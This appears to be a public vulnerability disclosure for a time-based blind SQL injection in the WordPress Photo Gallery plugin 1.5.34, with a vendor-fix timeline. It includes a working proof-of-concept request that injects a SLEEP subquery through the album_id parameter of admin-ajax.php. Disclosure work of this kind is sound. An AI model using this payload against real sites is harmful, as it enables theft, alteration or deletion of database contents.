Exploits / Vulnerability Discovered : 2019-09-10 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin photo gallery 1.5.34 sql injection is for educational purposes only and if it is used you will do on your own risk!
# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.
# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from
them.
# POC
In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection. Following is the POC,
2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&
# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure